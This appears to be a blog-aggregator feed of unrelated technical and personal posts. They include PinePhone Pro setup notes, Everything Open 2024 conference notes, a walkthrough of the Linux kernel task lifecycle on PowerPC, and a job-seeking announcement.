Of course, there’ll be ups and downs. It’s always okay to go back to the start, and reminder yourself (and your community!) of the positive reasons that you’re all working together on this.
Oh, and please try to remember that one day, you’re probably not going to be the right person to lead your project any more. This isn’t something to fear, or to look forward to, really: projects, communities, and individuals all grow and change. It’s probably going to be a weird time when you get to this point, but it doesn’t have to be a time of upheaval and uncertainty. If you’ve run the project well, you should hopefully have a deep pool of talented folks who can step in to continue what you began.
Finally, it would be remiss of me not to remind you to have fun! It’s easy to get lost in conflict at times, but it’s important to remember that… it’s just a CMS. It’s not going to be the end of the world if you take time away from the project, it’s actively beneficial for you to have a life outside of the internet. Friends, family, pets, hobbies: make time for the things that matter in your life.
I believe buying a Kindle in 2024 is a bad idea, even if you only intend to use it for reading DRM-free locally stored ebooks. Basic functions such as organizing books into folders/collections are locked until the device is registered and with each system update the interface has became slower and more bloated.
Initially I purchased this device because Amazon book store isn’t too bad and it’s one of the easier way to buy Japanese books outside of Japan, but with all the anti-features Amazon add in I don’t think it’s still worth using.
Using a recent exploit and with this downgrader thread on the mobileread forum, I’m able to downgrade my paperwhite to an older 5.11.2 firmware which has a simpler interface while being much more responsive. If you already have a Kindle perhaps this is worth doing.
It’s possible to install alternative UI and custom OS to many Kindle models but they generally run slower than the default launcher. On the open hardware side Pine64 is making an e-ink tablet called the PineNote with an Rockchip RK3566 and 4G of RAM it should be fast enough to handle most documents/ebooks, but currently there is no usable Linux distribution for it.
Nearly 15 years ago, I emailed the 20-something-year-old founder of a little tech startup with a weird name. As I recall, there were maybe 20 or so people doing WordPress-y things there at the time. I started doing a bit of contract work (the hiring process wasn’t as organised back then as it is today!) and, a couple of years after that, signed up full time.
Over 12 years later, that weird little startup has grown into a big company. It does a whole lot more than just WordPress, and it’s been a spectacular ride to get here. I’ve seen tiny little experiments and hacks grow up to be hugely popular products; I’ve worked with some of the smartest and most talented people I’ve ever met; and I even got to help lead WordPress development for a while.
Along the way, I’ve travelled around the world multiple times, meeting thousands of folks in the WordPress community, in countless cities. We’ve built stuff together that’s been used by hundreds of millions of people and viewed by billions!
Over the years, there are very few parts of Automattic that I hadn’t at least dipped my toes into. I’m extremely proud of everything I accomplished there, but it also gave me the sense that I’d finally reached the end of what there was for me to work on there.
And so, a few months ago, I decided it was time for me to go exploring for new challenges. I finished up and have since been enjoying some time off, barely touching my computer. I’ve done a bit of gardening, ticked a lot of things off my to-do list around the house, and I’ve been truly able to relax for a good while.
Now, though, I’m refreshed and ready to set off on my next adventure. This is where you come in, dear reader! Perhaps you’re looking for a tech lead to help scale your startup. Maybe you’re looking for someone with extensive experience not just with WordPress, but with the entire WordPress ecosystem and community. You could be a larger company looking for a principal engineer to inspire cross-divisional collaboration, or tackle the technical debt that inevitably builds up over the years.
Those aren’t the only options, of course, but maybe they give you an idea of where I can help. If you have a role you think I’d be the perfect fit for, let’s chat about it! You can reach out to me on LinkedIn, or email me directly at gary@pento.net.
Finally, if you happen to work at a company that you think I should join, let me know in the comments, or drop me a message. I’m always interested in learning more about what it’s like to work for your company!
The easiest way to change/set PIN for FIDO2 token seems to be with Chromium/Chrome:
chrome://settings/securityKeys, or click Settings -> Privacy and Security -> Security -> Manage security keysCreate a PIN, if you don’t have a PIN set already, a new PIN will be created, otherwise you will be asked to change the existing pinHello amazing teachers! Are you looking for a fun and engaging way to bring history to life for your students? Meet Sabaton, a Swedish heavy metal band known for their powerful songs about historical events. While heavy metal might not be the first thing that comes to mind for a primary school setting, Sabaton’s music […]
The post Rocking History: How Sabaton’s Songs Can Transform Your Classroom first appeared on OpenSTEM Pty Ltd.I’ve been daily driving the PinePhone Pro with swmo for some times now, it’s not perfect but I still find it be one of the most enjoyable devices I’ve used. Probably only behind BlackBerry Q30/Passport which also has a decent keyboard and runs an unfortunately locked-down version of QNX. For me it’s less like a phone and more like a portable terminal for times when using a full size laptop is uncomfortable or impractical, and with the keyboard it’s possible to write lengthy articles on the go.
This isn’t the only portable Linux terminal I owned, before this I used a Nokia N900 which till this day is still being maintained by the maemo leste team, but the shutdown of 3G network in where I live made it significantly less usable as a phone and since it doesn’t have a proper USB port I cannot use it as a serial console easily.
The overall experience on the PPP now as of 2024 isn’t as polished as that of the BlackBerry Passport, and adhoc hacks are often required to get the system going, however as the ecosystem progress the experience will also improve with new revisions of hardware and better software.
I use sxmo and swmo interchangeably in this post, they refer to the same framework running under Xorg and wayland, the experience is pretty much the same.
Sxmo is packaged for Debian:
sudo apt install sway sxmo-util
Allow access to LED/brightness:
sudo usermod -aG feedbackd user
The default scaling of sxmo doesn’t allow the many desktop applications to display their window properly, especially when such application is written under the assumption of being used on a larger screen. To set the scaling to something more reasonable, add the following line to ~/.config/sxmo/sway:
exec wlr-randr --output DSI-1 --scale 1.3
When using swmo environment initialization is mostly done in ~/.config/sxmo/sway and ~/.config/sxmo/xinit is not used.
Scaling for Firefox needs to be adjusted separately by first enabling compact UI and then set settings -> default zoom to your liking.
I used lightdm as my session manager, to launch lightdm in landscape mode, change the display-setup-script line in the [Seat:*] section of /etc/lightdm/lightdm.conf to:
display-setup-script=sh -c 'xrandr -o right; exit 0'
To rotate to swmo to landscape mode on start:
$ echo exec sxmo_rotate.sh >> ~/.config/sxmo/sway
To rotate Linux framebuffer, add fbcon=rotate:1 to the U_BOOT_PARAMETERS line in /usr/share/u-boot-menu/conf.d/mobian.conf and run u-boot-update to apply.
I also removed quiet splash from U_BOOT_PARAMETERS to disable polymouth animation as it isn’t very useful on landscape mode.
Swmo doesn’t come with a secure screen locker. but swaylock works fine and it can be bind to a key combination with sway’s configure file. To save some battery life, systemctl suspend can be triggered after swaylock, to bind that to Meta+L:
# .config/sxmo/sway
bindsym $mod+l exec 'swaylock -f -c 000000 && systemctl suspend'
In suspend mode, the battery discharge at a rate of about 1% per hour, I consider this to be more than acceptable.
To unlock from a shell, just kill swaylock.
Before you can suspend the system as a non-root user, the following polkit rule needs to be written to /etc/polkit-1/rules.d/85-suspend.rules:
polkit.addRule(function(action, subject) {
if (action.id == "org.freedesktop.login1.suspend" &&
subject.isInGroup("users")) {
return polkit.Result.YES;
}
});
It would be better if there can be a universal interactive user group which automatically grant such permission to the desktop/mobile user.
The default keymap for the PinePhone keyboard is missing a few useful keys, namely F11/F12 and PgUp/PgDown. To create those keys I used evremap(1) to make a custom keymap. Unfortunately the Fn key cannot be mapped as a layer switcher easily, so I opted to remap AltG and Esc as my primary modifiers.
I’m working on a Debian package for evremap and it will be made available for Debian/Mobian soon.
Incus is a container/VM manager for Linux, it’s available for Debian from bookworm/backports and is a fork of LXD by the original maintainers behind LXD. It works well for creating isolated and unprivileged containers. I have multiple incus containers on the PinePhone Pro for Debian packaging and it’s a better experience than manually creating and managing chroots. In case there is a need for running another container inside an unprivileged incus container, it’s possible to configure incus to intercept certain safe system calls and forward them to the host, removing the need for using privileged container.
Sway is decently usable in convergence mode, in which the phone is connected to a dock that outputs to an external display and keyboard and mouse are used as primary controls instead of the touchscreen.
This isn’t surprising since sway always had great support for multi monitor, however another often overlooked convergence mode is with waypipe. In this mode another Linux machine (e.g. a laptop) can be used to interact with applications running on the phone and the phone will be kept charged by the laptop. This is particularly useful for debugging phone applications or for accessing resources on the phone (e.g. sending and receiving sms). One thing missing in this setup is that graphic applications cannot roam between the phone and the external system (e.g. move running applications from one machine to another). Xpra does this for Xorg but doesn’t work with wayland.
Due to the simplicity of the swmo environment it’s not too difficult to get the system running with SELinux in Enforcing mode, and I encourage everyone reading this to try it. If running debian/mobian a good starting point is the SELinux/Setup page on Debian wiki.
Note: selinux-activate won’t add the required security=selinux kernel option to u-boot (it only deals with GRUB) so you have to manually add it to the U_BOOT_PARAMETERS line in /usr/share/u-boot-menu/conf.d/mobian.conf and run u-boot-update after selinux-activate. The file labeling process can easily take 10 minutes and the progress won’t be displayed on the framebuffer (only visible via the serial console).
SELinux along with the reference policy aren’t enough for building a reasonably secure interactive system, but let’s leave that for a future post.
The April 2024 meeting is the first meeting after Everything Open 2024 and the discussions are primarily around talks and lectures people found interesting during the conference, including the n3n VPN and the challenges of running personal email server. At the start of the meeting Yifei Zhan demonstrated a development build of Maemo Leste, an active Maemo-like operating system running on a PinePhone Pro.
Other topics discussed including modern network protocol ossification, SIP and possible free and open source VoLTE implementation.
The PinePhone keyboard contains a battery, which will be used to charge the PinePhone when the keyboard is attached. Althrough there are existing warnings on the pine64 wiki which sums up to ‘don’t charge or connect anything to your pinephone’s type C interface when the keyboard is attached’, my two pinephone keyboards still managed to fry themselves, with one releasing stinky magic smoke and the other melting the plastic around the pogo pins on the pinephone backplate.
This all happened while the pinephone’s type C interface being physically block when attached to the keyboard. In the first case, the keyboard’s controller PCB blew up when I tried to charge it, in the latter case the keyboard somehow overheated and melted the plastic near the pogo interface on the phone side.
Pine64 provided me a free replacement keyboard after multiple emails back and forth, but according to Pine64 there will be no more free replacement for me in future, and there is no guarantee that this will not happen to my replacement keyboard.
The cost for replacing all the fried parts with spare parts from the Pine64 store is about 40 USD (pogo pins + backplate + keyboard PCB), and considering this problem is likely to happen again, I don’t think purchasing those parts is a wise decision.
Both the melting plastic and the magic smoke originated from the fact that charges are constantly shuffled around when the keyboard is attached to the pinephone, and since the keyboard can function independently from the battery, we can disconnect and remove the battery from the keyboard case to make sure it will not blow up again. After such precedure the keyboard will keep functioning althrough the keyboard-attached pinephone might flip over much more easily due to the lightened keyboard base. Be aware that the keyboard isn’t designed to be taken apart, and doing so will likely result in scratches on the case. As for me, I’d much rather have a keyboard case without builtin battery than have something that can overheat or blow up.
To prevent the kernel module from flooding the dmesg and reporting bogus battery level after the battery removal, blacklist the ip5xxx_power module:
# echo blacklist ip5xxx_power > /etc/modprobe.d/blacklist.conf
I didn’t take as much notes on day 2 and 3, so I merged them into a single article.
Adversaries:
LLM can help eliminate common language mistakes, perform better social enginerring
Many adversaries are trying to integrate LLMs into their workflow, with varying results
Time frame from initial foothold to lateral movements is getting shorter, due to better toolings?
porting syzcaller to run on Power
general fuzzinng engines
Unsupervised: no human input required
Coveraged-guided: fuzz and measures which codepath is fuzzed
Things to fuzz: syscalls/dxrivers/fs/ebpf/kvm/network stacks…
Simple kernel fuzzers existed est. 1991
Hosted version on Google Cloud: https://syzkaller.appspot.com/upstream
Sanitisers: print errors on memory corruption/UB/concurrency problems etc
KMSAN isn’t on Power yet
Hardware:
New architecture enablement
Stack traces are printed differently across archs
instruction fuzzing
QEMU/KVM on bare metal Open Power systems
Bug found:
PowerVM
PowerVC
FileSender
radio::console
AgOpenGPS
BPF made creating new scheduler simpler
Scheduling problem is now more complicated due to increasing complexity of workload/CPU design
BPF provides reliable access to critical data structures inside the kernel
Forked from n2n to avoid CLA
Peer-to-peer VPN at network layer, acting like a distributed virtual switch
NAT piecing
Written in C, should have good cross-platform supports (more testing wanted on *BSD)
TunTap interface support is expected from the OS side, shouldn’t be a problem for common Unix-likes
Packaging and distro submission are still WIP
Future roadmap
Useful for
Simpler than wireguard/openvpn but offers OK security (not for security-critical apps?)
Easier to configure, use INI style config files
seL4 is bad at usability, Lions OS intends to solve this
Still in early stage of development
Composable components for build custom OS for a single task
Focus on simplicity
0.1.0 just released, still in its early stage
high performance
Only for Arm64/aarch64 now, riscv64 in future?
A reference system called Kitty exists
Here you can find a list of links related to my topic which I find useful or just interesting.
Info page https://2024.everythingopen.au/schedule/presentation/24/
Slides EO2024.Slides.exploring.mobile.linux.security.odp
Recording XXX to be processed
VerityMobile GitHub :: ZhanYF/veritymobile
Access Measurements from Linux Userland
Sign in to GitLab with fTPM-backed FIDO token
https://optee.readthedocs.io/en/latest/general/about.html
https://optee.readthedocs.io/en/latest/architecture/secure_storage.html
https://optee.readthedocs.io/en/latest/architecture/globalplatform_api.html#globalplatform-api
https://optee.readthedocs.io/en/latest/general/presentations.html
https://source.android.com/docs/security/features/trusty
https://support.apple.com/en-sg/guide/security/sec59b0b31ff/web
This also covers Measured Boot and Secure Boot
https://next.redhat.com/2021/05/13/what-can-you-do-with-a-tpm/
https://github.com/psanford/tpm-fido
https://www.ledger.com/blog/ssh-with-tpm
https://bootlin.com/pub/conferences/2021/lee/perrot-secure-boot/perrot-secure-boot.pdf
https://github.com/kkamagui/shadow-box-for-arm https://github.com/kkamagui/manifest
https://github.com/kkamagui/shadow-box-for-x86
https://blog.3mdeb.com/2021/2021-12-03-rockchip-secure-boot/
https://sergioprado.blog/rpmb-a-secret-place-inside-the-emmc/
https://github.com/firecracker-microvm/firecracker
https://github.com/firecracker-microvm/firectl
CPU cores are limited in number. Right now my computer tells me it's running around 500 processes, and I definitely do not have that many cores. The operating system's ability to virtualise work as independent 'executable units' and distribute them across the limited CPU pool is one of the foundations of modern computing.
The Linux kernel calls these virtual execution units tasks1. Each task encapsulates all the information the kernel needs to swap it in and out of running on a CPU core. This includes register state, memory mappings, open files, and any other resource that needs to be tied to a particular task. Nearly every work item in the kernel, including kernel background jobs and userspace processes, is handled by this unified task concept. The kernel uses a scheduler to determine when and where to run tasks according to some parameters, such as maximising throughput, minimising latency, or whatever other characteristics the user desires.
In this article, we'll dive into the lifecycle of a task in the kernel. This is a PowerPC blog, so any architecture specific (often shortened to 'arch') references are referring to PowerPC. To make the most out of this you should also have a copy of the kernel source open alongside you, to get a sense of what else is happening in the locations we discuss below. This article hyper-focuses on specific details of setting up tasks, leaving out a lot of possibly related content. Call stacks are provided to help orient yourself in many cases.
The kernel starts up with no concept of tasks, it just runs from the location
the bootloader started it (the __start function for PowerPC). The first idea
of a task takes root in early_setup() where we initialise the PACA (I asked,
but what this stands for is unclear). The PACA is used to hold a lot of core
per-cpu information, such as the CPU index (for generic per-cpu variables) and a
pointer to the active task.
__start() // ASM implementation, defined in head_64.S
__start_initialization_multiplatform()
__after_prom_start()
start_here_multiplatform()
early_setup() // switched to C here, defined in setup_64.c
initialise_paca()
new_paca->__current = &init_task;
We use the PACA to (among other things) hold a reference to the active task. The
task we start with is the special init_task. To avoid ambiguity with the
userspace init task we see later, I'll refer to init_task as the boot task
from here onwards. This boot task is a statically defined instance of a
task_struct that is the root of all future tasks. Its resources are likewise
statically defined, typically named following the pattern init_*. We aren't
taking advantage of the context switching capability of tasks this early in
boot, we just need to look like we're a task for any initialisation code that
cares. For now we continue to work as a single CPU core with a single task.
We continue on and reach start_kernel(), the generic entry point of the kernel
once any arch specific bootstrapping is sufficiently complete. One of the first
things we call here is setup_arch(), which continues any initialisation that
still needs to occur. This is where we call smp_setup_pacas() to allocate a
PACA for each CPU; these all get the boot task as well (all referencing the same
init_task structure, not copies of it). Eventually they will be given their
own independent tasks, but during most of boot we don't do anything on them so
it doesn't matter for now.
The next point of interest back in start_kernel() is fork_init(). Here we
create a task_struct allocator to serve any task creation requests. We also
limit the number of tasks here, dynamically picking the limit based on the
available memory, page size, and a fixed upper bound.
void __init fork_init(void) {
// ...
/* create a slab on which task_structs can be allocated */
task_struct_whitelist(&useroffset, &usersize);
task_struct_cachep = kmem_cache_create_usercopy("task_struct",
arch_task_struct_size, align,
SLAB_PANIC|SLAB_ACCOUNT,
useroffset, usersize, NULL);
// ...
}
At the end of start_kernel() we reach rest_init() (as in 'do the rest of the
init'). In here we create our first two dynamically allocated tasks: the init
task (not to be confused with init_task, which we are calling the boot task),
and the kthreadd task (with the double 'd'). The init task is (eventually) the
userspace init process. We create it first to get the PID value 1, which is
relied on by a number of things in the kernel and in userspace2. The
kthreadd task provides an asynchronous creation mechanism for kthreads: callers
append their thread parameters to a dedicated list, and the kthreadd task spawns
any entries on the list whenever it gets scheduled. Creating these tasks
automatically puts them on the scheduler run queue, and they might even start
automatically with preemption.
// init/main.c
noinline void __ref __noreturn rest_init(void)
{
struct task_struct *tsk;
int pid;
rcu_scheduler_starting();
/*
* We need to spawn init first so that it obtains pid 1, however
* the init task will end up wanting to create kthreads, which, if
* we schedule it before we create kthreadd, will OOPS.
*/
pid = user_mode_thread(kernel_init, NULL, CLONE_FS);
/*
* Pin init on the boot CPU. Task migration is not properly working
* until sched_init_smp() has been run. It will set the allowed
* CPUs for init to the non isolated CPUs.
*/
rcu_read_lock();
tsk = find_task_by_pid_ns(pid, &init_pid_ns);
tsk->flags |= PF_NO_SETAFFINITY;
set_cpus_allowed_ptr(tsk, cpumask_of(smp_processor_id()));
rcu_read_unlock();
numa_default_policy();
pid = kernel_thread(kthreadd, NULL, NULL, CLONE_FS | CLONE_FILES);
rcu_read_lock();
kthreadd_task = find_task_by_pid_ns(pid, &init_pid_ns);
rcu_read_unlock();
/*
* Enable might_sleep() and smp_processor_id() checks.
* They cannot be enabled earlier because with CONFIG_PREEMPTION=y
* kernel_thread() would trigger might_sleep() splats. With
* CONFIG_PREEMPT_VOLUNTARY=y the init task might have scheduled
* already, but it's stuck on the kthreadd_done completion.
*/
system_state = SYSTEM_SCHEDULING;
complete(&kthreadd_done);
/*
* The boot idle thread must execute schedule()
* at least once to get things moving:
*/
schedule_preempt_disabled();
/* Call into cpu_idle with preempt disabled */
cpu_startup_entry(CPUHP_ONLINE);
}
After this, the boot task calls cpu_startup_entry(), which transforms it into
the idle task for the boot CPU and enters the idle loop. We're now almost fully
task driven, and our journey picks back up inside of the init task.
Bonus tip: when looking at the kernel boot console, you can tell what print
actions are performed by the boot task vs the init task. The init_task has PID
0, so lines start with T0. The init task has PID 1, so appears as T1.
[ 0.039772][ T0] printk: legacy console [hvc0] enabled
...
[ 28.272167][ T1] Run /init as init process
When we created the init task, we set the entry point to be the kernel_init()
function. Execution simply begins from here3 once it gets woken up for
the first time. The very first thing we do is wait4 for the kthreadd task
to be created: if we were to try and create a kthread before this, when the
kthread creation mechanism tries to wake up the kthreadd task it would be using
an uninitialised pointer, causing an oops. To prevent this, the init task waits
on a completion object that the boot task marks completed after creating
kthreadd. We could technically avoid this synchronization altogether just by
creating kthreadd first, but then the init task wouldn't have PID 1.
The rest of the init task wraps up the initialisation stage as a whole. Mostly
it moves the system into the 'running' state after freeing any memory marked as
for initialisation only (set by __init annotations). Once fully initialised
and running, the init task attempts to execute the userspace init program.
if (ramdisk_execute_command) {
ret = run_init_process(ramdisk_execute_command);
if (!ret)
return 0;
pr_err("Failed to execute %s (error %d)\n",
ramdisk_execute_command, ret);
}
if (execute_command) {
ret = run_init_process(execute_command);
if (!ret)
return 0;
panic("Requested init %s failed (error %d).",
execute_command, ret);
}
if (CONFIG_DEFAULT_INIT[0] != '\0') {
ret = run_init_process(CONFIG_DEFAULT_INIT);
if (ret)
pr_err("Default init %s failed (error %d)\n",
CONFIG_DEFAULT_INIT, ret);
else
return 0;
}
if (!try_to_run_init_process("/sbin/init") ||
!try_to_run_init_process("/etc/init") ||
!try_to_run_init_process("/bin/init") ||
!try_to_run_init_process("/bin/sh"))
return 0;
panic("No working init found. Try passing init= option to kernel. "
"See Linux Documentation/admin-guide/init.rst for guidance.");
What file the init process is loaded from is determined by a combination of the system's filesystem, kernel boot arguments, and some default fallbacks. The locations it will attempt, in order, are:
rdinit= boot command line parameter, with default path
/init. An initcall run earlier searches the boot arguments for rdinit and
initialises ramdisk_execute_command with it. If the ramdisk does not
contain the requested file, then the kernel will attempt to automatically
mount the root device and use it for the subsequent checks.init= boot command line parameter. Like with rdinit, the
execute_command variable is initialised by an early initcall looking for
init in the boot arguments./sbin/init/etc/init/bin/init/bin/shShould none of these work, the kernel just panics. Which seems fair.
Until now we've focused on the boot CPU. While the utility of a task still applies to a uniprocessor system (perhaps even more so than one with hardware parallelism), a nice benefit of encapsulating all the execution state into a data structure is the ability to load the task onto any other compatible processor on the system. But before we can start scheduling on other CPU cores, we need to bring them online and initialise them to a state ready for the scheduler.
On the pSeries platform, the secondary CPUs are held by the firmware until
explicitly released by the guest. Early in boot, the boot CPU (not task! We
don't have tasks yet) will iterate the list of held secondary processors and
release them one by one to the __secondary_hold function. As each starts
executing __secondary_hold, it writes a value to the
__secondary_hold_acknowledge variable that the boot CPU is watching. The
secondary processor then immediately starts spinning on
__secondary_hold_spinloop, waiting for it to become non-zero, while the boot
CPU moves on to the the next processor.
// Boot CPU releasing the coprocessors from firmware
__start()
__start_initialization_multiplatform()
__boot_from_prom()
prom_init() // switched to C here
prom_hold_cpus()
// secondary_hold is alias for __secondary_hold assembly function
call_prom("start-cpu", ..., secondary_hold, ...); // on each coprocessor
Once every coprocessor is confirmed to be spinning on
__secondary_hold_spinloop, the boot CPU continues on with its boot sequence.
Once we reach setup_arch() as above, the boot task invokes
smp_release_cpus() early in start_kernel(), which writes the desired entry
point address of the coprocessors to __secondary_hold_spinloop. All the
spinning coprocessors now see this value, and jump to it. This function,
generic_secondary_smp_init(), will set up the coprocessor's PACA value,
perform some machine specific initialisation if cur_cpu_spec->cpu_restore is
set,5 atomically decrement a spinning_secondaries variable, and start
spinning once again until further notice. This time it is waiting on the PACA
field cpu_start, so we can start coprocessors individually.
We leave the coprocessors here for a while, until the init task calls
kernel_init_freeable(). This function is used for any initialisation required
after kthreads are running, but before all the __init sections are
dropped. The setup relevant to coprocessors is the call to smp_init(). Here we
fork the current task (the init task) once for each coprocessor with
idle_threads_init(). We then call bringup_nonboot_cpus() to make each
coprocessor start scheduling.
The exact code paths here are both deep and indirect, so here's the interesting part of the call tree for the pSeries platform to help guide you through the code.
// In the init task
smp_init()
idle_threads_init() // create idle task for each coprocessor
bringup_nonboot_cpus() // make each coprocessor enter the idle loop
cpuhp_bringup_mask()
cpu_up()
_cpu_up()
cpuhp_up_callbacks() // invokes the CPUHP_BRINGUP_CPU .startup.single function
bringup_cpu()
__cpu_up()
cpu_idle_thread_init() // sets CPU's task in PACA to its idle task
smp_ops->prepare_cpu() // on pSeries inits XIVE if in use
smp_ops->kick_cpu() // indirect call to smp_pSeries_kick_cpu()
smp_pSeries_kick_cpu()
paca_ptrs[nr]->cpu_start = 1 // the coprocessor was spinning on this value
Interestingly, the entry point declared when cloning the init task for the coprocessors is never used. This is because the coprocessors never get woken up from the hand-crafted init state the way new tasks normally would. Instead they are already executing a code path, and so when they next yield they will just clobber the entry point and other registers with their actually running task state.
The last remaining job of the kernel side of the init task is to actually load in and execute the selected userspace program. It's not like we can just call the userspace entry point though: we need to be a little creative here.
As alluded to above, when we create tasks with clone_thread(), it doesn't set
the provided entry point directly: it instead sets a small shim that is actually
used when the new task eventually gets woken up. The particular shim it uses is
determined by whether the task is a kthread or not.
Both kinds of shim expect the requested entry point to be passed via a specific non-volatile register and, in the case of a kthread, basically just invokes it after some minor bookkeeping. A kthread should never return directly, so it traps if this happens.
_GLOBAL(start_kernel_thread)
bl CFUNC(schedule_tail)
mtctr r14
mr r3,r15
#ifdef CONFIG_PPC64_ELF_ABI_V2
mr r12,r14
#endif
bctrl
/*
* This must not return. We actually want to BUG here, not WARN,
* because BUG will exit the process which is what the kernel thread
* should have done, which may give some hope of continuing.
*/
100: trap
EMIT_BUG_ENTRY 100b,__FILE__,__LINE__,0
But the init task isn't a kthread. We passed a kernel entrypoint to
copy_thread() but did not set the kthread flag, so copy_thread() inferred
that this means the task will eventually run in userspace. This makes it use the
ret_from_kernel_user_thread() shim.
_GLOBAL(ret_from_kernel_user_thread)
bl CFUNC(schedule_tail)
mtctr r14
mr r3,r15
#ifdef CONFIG_PPC64_ELF_ABI_V2
mr r12,r14
#endif
bctrl
li r3,0
/*
* It does not matter whether this returns via the scv or sc path
* because it returns as execve() and therefore has no calling ABI
* (i.e., it sets registers according to the exec()ed entry point).
*/
b .Lsyscall_exit
We start off identically to a kthread, except here we expect the task to return.
This is the key: when the init task wants to transition to userspace, it sets up
the stack frame as if we were serving a syscall. It then returns, which runs the
syscall exit procedure that culminates in an rfid to userspace.
The actual setting up of the syscall frame is handled by the
(try_)run_init_process() function. The interesting call path goes like
run_init_process()
kernel_execve()
bprm_execve()
exec_binprm()
search_binary_handler()
list_for_each_entry(fmt, &formats, lh)
retval = fmt->load_binary(bprm);
The outer few calls mainly handle checking prerequisites and bookkeeping. The
exec_binrpm() call also handles shebang redirection, allowing up to 5 levels
of interpreter. At each level it invokes search_binary_handler(), which
attempts to find a handler for the program file's format. Contrary to the name,
the searcher will also immediately try to load the file if it finds an
appropriate handler. It's this call to load_binary (dispatched to whatever
handler was found) that sets up our userspace execution context, including the
syscall return state.
All that's left to do here is return 0 all the way up the chain, which you'll see results in the init task returning to the shim that performs the syscall return sequence to userspace. The init task is now fully userspace.
It feels like we've spent a lot of time discussing the init task. What about all the other tasks?
It turns out that the creation of the init task is very similar to any other
task. All tasks are clones of the task that created them (except the statically
defined init_task). Note 'clone' is being used in a loose sense here: it's not
an exact image of the parent. There's a configuration parameter that determines
which components are shared, and which are made into independent copies. The
implementation may also just decide to change some things that don't make sense
to duplicate, such as the task ID to distinguish it from the parent.
As we saw earlier, kthreads are created indirectly through a global list and kthreadd daemon task that does the actual cloning. This has two benefits: allowing asynchronous task creation from atomic contexts, and ensuring all kthreads inherit a 'clean' task context, instead of whatever was active at the time.
Userspace task creation, beyond the init task, is driven by the userspace
process invoking the fork() and clone() family of syscalls. Both of these
are light wrappers over the kernel_clone() function, which we used earlier for
the creation of the init task and kthreadd.
When a task runs a syscall in the exec() family, it doesn't create a new task.
It instead hits the same code path as when we tried to run the userspace init
program, where it loads in the context as defined by the program file into the
current task and returns from the syscall (legitimately this time).
The last piece of the puzzle (as far as this article will look at!) is how tasks
are switched in and out, and some of the rules around when it can and can't
happen. Once the init and kthreadd tasks are created, we call
cpu_startup_entry(CPUHP_ONLINE). Any coprocessors have also been released to
call this by now too. Their tasks are repurposed to 'idle tasks', which serve to
run when no other tasks are available to run. They will spin on a check for
pending work, entering an idle state each loop until they see pending tasks to
run. They then call __schedule() in a loop (also conditional on pending tasks
existing), and then return back to the idle loop once everything in the moment
is handled.
The __schedule() function is the main guts of the scheduler, which until now
has seemed like some nebulous controller that's governing when and where our
tasks run. In reality it isn't one isolated part of the system, but a function
that a task calls when it decides to yield to any other waiting tasks. It starts
by deciding which pending task should run (a whole can of worms right there),
and then executing context_switch() if it changes from the current task.
context_switch() is the point where the current task starts to change.
Specifically, you can trace the changing of current (i.e., the PACA being
updated with a new task pointer) to the following path
context_switch()
switch_to()
__switch_to()
_switch()
do_switch_64
std r6,PACACURRENT(r13)
One interesting consequence of tasks calling context_switch() is that the
previous task is 'suspended'6 right where it saves its registers and puts in
the new task's values. When it is woken up again at some point in the future it
resumes right where it left off. So when you are reading the __switch_to()
implementation, you are actually looking at two different tasks in the same
function.
But it gets even weirder: while tasks that put themselves to sleep here wake up
inside of _switch(), new tasks being woken up for the first time start at a
completely different location! So not only is the task changing, the _switch()
call might not even return back to __switch_to()!
And there you have it, everything[citation needed] you could ever need to know when getting started with tasks. Will you need to know this specifically? Hard to say. But hopefully it at least provides some useful pointers for understanding the execution model of the kernel.
The following are some questions you might have (read: I had).
No, the task struct stays the same. The task struct declares it represents a userspace task, but it stays as the active task when serving syscalls or similar actions on behalf of its userspace execution.
Thanks to address space quadrants we don't even need to change the active memory mapping: upon entry to the kernel we automatically start using the PID 0 mapping.
Software PIDs are allocated when spawning a new process. However, if the process
shares memory mappings with another (such as threads can), it may not be
allocated a new hardware PID. Referring to the PID used for virtual memory
translations, the hardware PID is actually a property of the memory mapping
struct (mm_struct). You can find a hardware PID being allocated when a new
mm_struct is created, which may or may not occur depending on the task clone
parameters.
Fork (and clone) will always invoke copy_thread(). The exec call will invoke
start_thread() when loading a binary file. Any other kind of file (script,
binfmt-misc) will eventually require some form of binary file to load/bootstrap
it, so start_thread() should work for your purposes. You can also use
arch_setup_new_exec() for a cleaner hook into exec.
The task context of the calls is fairly predictable: current in
copy_thread() refers to the parent because we are still in the middle of
copying it. For start_thread(), current refers to the task that is going to
be the new program because it is just configuring itself.
When a hardware interrupt triggers it just stops whatever it was doing and dumps
us at the corresponding exception handler. Our current value still points to
whatever task is active (restoring the PACA is done very early). If we were in
userspace (MSRPR was 1) we consider ourselves to be in 'process
context'. This is, in some sense, the default state in the kernel. We are able
to sleep (i.e., invoke the scheduler and swap ourselves out), take locks, and
generally do anything you might like to do in the kernel. This is in contrast
to 'atomic context', where certain parts of the kernel expect to be executed
without interruption or sleeping.
However, we are a bit more restricted if we arrived at an interrupt from
supervisor mode. For example, we don't know if we interrupted an atomic context,
so we can't safely do anything that might cause sleep. This is why in some
interrupt handlers like do_program_check() we have to check user_mode(regs)
before we can read a userspace instruction7.
Read more on tasks in my previous post ↩
One example of the init task being special is that the kernel will not allow its process to be killed. It must always have at least one thread. ↩
Well, it actually begins at a small assembly shim, but close enough for now. ↩
The wait mechanism itself is an interesting example of interacting with
the scheduler. Starting with a common struct completion object, the waiting
task registers itself as awaiting the object to complete. Specifically, it adds
its task handle to a queue on the completion object. It then loops calling
schedule(), yielding itself to other tasks, until the completion object is
flagged as done. Somewhere else another task marks the completion object as
completed. As part of this, the task marking the completion tries to wake up any
task that has registered itself as waiting earlier. ↩
The cur_cpu_spec->cpu_restore machine specific initialisation is
based on the machine that got selected in
arch/powerpc/kernel/cpu_specs_book3s_64.h. This is where the
__restore_cpu_* family of functions might be called, which mostly
initialise certain SPRs to sane values. ↩
Don't forget that the entire concept of tasks is made up by the kernel: from the hardware's point of view we haven't done anything interesting, just changed some registers. ↩
The issue with reading a userspace instruction is that the page access may require the page be faulted in, which can sleep. There is a mechanism to disable the page fault handler specifically, but then we might not be able to read the instruction. ↩
I got a call yesterday from a guy who had looked at the Experia Bruce has at Zen and was considering buying one. I talked with him for about three quarters of an hour, going through my experience, and to sum it up simply I can just say: this is a fantastic motorbike.
